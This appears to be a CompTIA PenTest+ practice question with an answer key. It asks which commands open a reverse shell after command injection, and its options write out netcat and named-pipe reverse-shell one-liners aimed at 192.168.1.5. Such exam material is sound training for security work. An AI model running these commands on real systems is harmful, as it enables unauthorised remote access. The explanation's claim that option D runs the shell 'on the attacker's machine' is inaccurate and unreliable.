CompTIA PenTest+ (PT0-001) — Question 192

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

Answer options

• A. nc 192.168.1.5 44444
• B. nc -nlvp 44444 -e /bin/sh
• C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
• D. nc -e /bin/sh 192.168.1.5 44444
• E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
• F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

Correct answer: C, D

Explanation

Options C and D are valid methods for establishing a reverse shell. Option C uses a named pipe to facilitate the shell interaction, while Option D uses netcat to directly execute a shell on the attacker's machine. Options A and B do not establish a reverse connection, and options E and F contain errors in the target port or IP address.